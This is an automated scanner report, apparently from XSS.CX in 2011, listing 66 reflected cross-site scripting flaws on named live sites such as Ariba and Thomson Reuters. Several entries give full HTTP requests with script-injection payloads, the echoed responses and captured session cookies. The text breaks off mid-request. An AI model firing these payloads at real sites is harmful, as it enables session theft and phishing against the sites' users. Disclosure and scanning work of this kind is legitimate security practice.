XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-06

Report generated by XSS.CX at Tue Oct 18 14:17:33 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. https://app.suppliergateway.com/genReg/MControl.WebPages.aspx [Res parameter]

1.2. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]

1.3. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]

1.4. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

1.5. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

1.6. http://cdnt.meteorsolutions.com/api/multi_track [name of an arbitrarily supplied request parameter]

1.7. http://cdnt.meteorsolutions.com/api/multi_track [query_string_tag_key parameter]

1.8. http://cdnt.meteorsolutions.com/api/multi_track [url_storage_source parameter]

1.9. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

1.10. https://cert.webtrust.org/SealFile [seal parameter]

1.11. https://cert.webtrust.org/ViewSeal [id parameter]

1.12. https://connect.ariba.com/AC [name of an arbitrarily supplied request parameter]

1.13. https://connect.ariba.com/AC_Login/ [IsErr parameter]

1.14. https://connect.ariba.com/AC_Login/ [name of an arbitrarily supplied request parameter]

1.15. https://connect.ariba.com/AC_Login/ [sc parameter]

1.16. https://connect.ariba.com/AC_Login/ [sc parameter]

1.17. https://connect.ariba.com/AC_Login/ [u parameter]

1.18. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]

1.19. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]

1.20. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.21. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.22. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.23. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.24. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]

1.25. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]

1.26. https://cvmas13.cvmsolutions.com/gd/ [name of an arbitrarily supplied request parameter]

1.27. http://kbportal.thomson.com/display/2/loginSecure.aspx [catURL parameter]

1.28. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchby parameter]

1.29. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchstring parameter]

1.30. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchtype parameter]

1.31. http://kbportal.thomson.com/display/2/loginSecure.aspx [t parameter]

1.32. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [cpid parameter]

1.33. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [t parameter]

1.34. http://unitedsupplierdiversity.aecglobal.com/Popup/NaicsCodePopup.aspx [ParentAddFuntionName parameter]

1.35. http://unitedsupplierdiversity.aecglobal.com/Popup/categorypopup.aspx [ParentAddFuntionName parameter]

1.36. http://unitedsupplierdiversity.aecglobal.com/Popup/serviceareapopup.aspx [ParentAddFuntionName parameter]

1.37. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]

1.38. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]

1.39. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]

1.40. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]

1.41. http://www.ariba.com/404.cfm [pageLocation parameter]

1.42. http://www.ariba.com/404.cfm [pageLocation parameter]

1.43. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]

1.44. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]

1.45. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]

1.46. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]

1.47. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]

1.48. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]

1.49. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]

1.50. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]

1.51. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]

1.52. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]

1.53. http://www.ariba.com/services/support.cfm [x parameter]

1.54. http://www.ariba.com/services/support.cfm [x parameter]

1.55. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]

1.56. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]

1.57. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]

1.58. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]

1.59. https://www.bidsync.com/SupplierRegister [REST URL parameter 1]

1.60. https://www.bidsync.com/favicon.ico [REST URL parameter 1]

1.61. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

1.62. http://www.ariba.com/contact.cfm [CAMPID cookie]

1.63. http://www.ariba.com/legal/en_webtrust.cfm [CAMPID cookie]

1.64. http://www.ariba.com/roles/it.cfm [CAMPID cookie]

1.65. http://www.ariba.com/services/support.cfm [CAMPID cookie]

1.66. http://www.ariba.com/solutions/ [CAMPID cookie]



1. Cross-site scripting (reflected)
There are 66 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://app.suppliergateway.com/genReg/MControl.WebPages.aspx [Res parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://app.suppliergateway.com
Path:   /genReg/MControl.WebPages.aspx

Issue detail

The value of the Res request parameter is copied into the HTML document as plain text between tags. The payload 408a1<script>alert(1)</script>ae62de57932 was submitted in the Res parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /genReg/MControl.WebPages.aspx?Res=SetFocus.js408a1<script>alert(1)</script>ae62de57932 HTTP/1.1
Host: app.suppliergateway.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://app.suppliergateway.com/genReg/registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=onvrizm2ofkfwe45o2a2rvq3; starttime=10/18/2011 1:29:12 PM; mySession=3b9fa546-1544-46cd-b35b-8660f7a1afe5

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:39:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Content-Length: 134

alert("Could not load resource 'SetFocus.js408a1<script>alert(1)</script>ae62de57932': Value cannot be null. Parameter name: stream");

1.2. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://careers.thomsonreuters.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload 153e3%0aalert(1)//9c6d97a8d56 was submitted in the id parameter. This input was echoed as 153e3
alert(1)//9c6d97a8d56
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workarea/java/ektronJs.ashx?id=EktronFlexMenuJS+EktronModalJS153e3%0aalert(1)//9c6d97a8d56 HTTP/1.1
Host: careers.thomsonreuters.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://careers.thomsonreuters.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1318953642520; s_cc=true; __utma=263655443.287320647.1318952180.1318953528.1318958637.3; __utmb=263655443.7.10.1318958637; __utmc=263655443; __utmz=263655443.1318958637.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=reuters%20supplier; s_sq=devthcorp%3D%2526pid%253Dgeneral_inquiries%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcareers.thomsonreuters.com%25252F%2526ot%253DA%26trcorp2%3D%2526pid%253Dabout%25252Fcontact_us%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstaging.thomsonreuters.com%25252Fgeneral_inquiries%25252F%2526ot%253DA; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=careers.thomsonreuters.com&SiteLanguage=1033; EktGUID=8427c5dc-960b-42ab-ac66-5e9250becc09; EkAnalytics=newuser; ASP.NET_SessionId=h2rbea55w0wthj55lv4duz55

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 51603
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 17 Oct 2012 17:27:14 GMT
Last-Modified: Tue, 18 Oct 2011 17:27:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 18 Oct 2011 17:27:14 GMT

function ekFlexMenu_classNames(){}ekFlexMenu_classNames.button="ekflexmenu_button";ekFlexMenu_classNames.buttonHover="ekflexmenu_button_hover";ekFlexMenu_classNames.buttonSelected="ekflexmenu_button_s
...[SNIP]...
gWindow.scrollTo(0,10000000)};

//################################################################
//ektron registered javascript: js file does not exist at specified path (404)
//id: EktronModalJS153e3
alert(1)//9c6d97a8d56

//path:
//################################################################


1.3. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://careers.thomsonreuters.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 8b293<script>alert(1)</script>6e2d80a3a45 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=8b293<script>alert(1)</script>6e2d80a3a45 HTTP/1.1
Host: careers.thomsonreuters.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://careers.thomsonreuters.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1318953642520; s_cc=true; __utma=263655443.287320647.1318952180.1318953528.1318958637.3; __utmb=263655443.7.10.1318958637; __utmc=263655443; __utmz=263655443.1318958637.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=reuters%20supplier; s_sq=devthcorp%3D%2526pid%253Dgeneral_inquiries%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcareers.thomsonreuters.com%25252F%2526ot%253DA%26trcorp2%3D%2526pid%253Dabout%25252Fcontact_us%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstaging.thomsonreuters.com%25252Fgeneral_inquiries%25252F%2526ot%253DA; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=careers.thomsonreuters.com&SiteLanguage=1033; EktGUID=8427c5dc-960b-42ab-ac66-5e9250becc09; EkAnalytics=newuser; ASP.NET_SessionId=h2rbea55w0wthj55lv4duz55

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 277
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 17 Oct 2012 17:27:12 GMT
Last-Modified: Tue, 18 Oct 2011 17:27:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 18 Oct 2011 17:27:11 GMT

//################################################################
//ektron registered javascript: js file does not exist at specified path (404)
//id: 8b293<script>alert(1)</script>6e2d80a3a45
//path:
//################################################################


1.4. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 868ae<script>alert(1)</script>e099352b230 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FmG2EmicrosoftG2EcomG2FOffice365G2FoofofficephotoG2FenG2DUSG2FgalleryG2EmspxG23fbidG3DoeXUNV1U7uAG26mtagG3DmbarG2Demail&shorten=tinyurl&id=1868ae<script>alert(1)</script>e099352b230&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:38 GMT
Etag: "b3169d0e8a28756971b17a901f7b337472c66a74"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/qhtqaa", "id": "1868ae<script>alert(1)</script>e099352b230", "persist": "http://meme.ms/persist?key=b4TaeuFWZrWi8uxs5u9X2w"}, 1);

1.5. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 93762<script>alert(1)</script>4d4f59b3a04 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FmG2EmicrosoftG2EcomG2FOffice365G2FoofofficephotoG2FenG2DUSG2FgalleryG2EmspxG23fbidG3DoeXUNV1U7uAG26mtagG3DmbarG2Demail&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B93762<script>alert(1)</script>4d4f59b3a04 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:41 GMT
Etag: "078a08ec55655de623dc81e38c29a1fe74cccdb6"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/qhtqaa", "id": "1", "persist": "http://meme.ms/persist?key=b4TaeuFWZrWi8uxs5u9X2w"}, 1);93762<script>alert(1)</script>4d4f59b3a04

1.6. http://cdnt.meteorsolutions.com/api/multi_track [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/multi_track

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1b0b<script>alert(1)</script>4259a824be9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/multi_track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_storage_source=hash&query_string_tag_key=CR_CC&query_string_tag_key=cr_cc&query_string_tag_key=mtag&c1b0b<script>alert(1)</script>4259a824be9=1 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:40 GMT
Etag: "f13c0f7df6a73801af4956d3f038dd5a12c4b073"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Content-Length: 475
Connection: keep-alive

if (typeof(meteor) === 'undefined' || meteor === null) { if (typeof(console) !== 'undefined' && console !== null) { console.log('ERROR: metsol needs to be included to track'); }} else { meteor.tracking.cdnt_data={"parent_id": "", "id": "oeXUNV1U7uA", "source": "cookie"}; meteor.tracking.track('210b48e7-54b9-49da-8cc7-374d915b8017',{"query_string_tag_key": ["CR_CC", "cr_cc", "mtag"], "c1b0b<script>alert(1)</script>4259a824be9": "1", "url_storage_source": "hash"});}

1.7. http://cdnt.meteorsolutions.com/api/multi_track [query_string_tag_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/multi_track

Issue detail

The value of the query_string_tag_key request parameter is copied into the HTML document as plain text between tags. The payload d05c9<script>alert(1)</script>95ea4625fe1 was submitted in the query_string_tag_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/multi_track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_storage_source=hash&query_string_tag_key=CR_CCd05c9<script>alert(1)</script>95ea4625fe1&query_string_tag_key=cr_cc&query_string_tag_key=mtag HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; 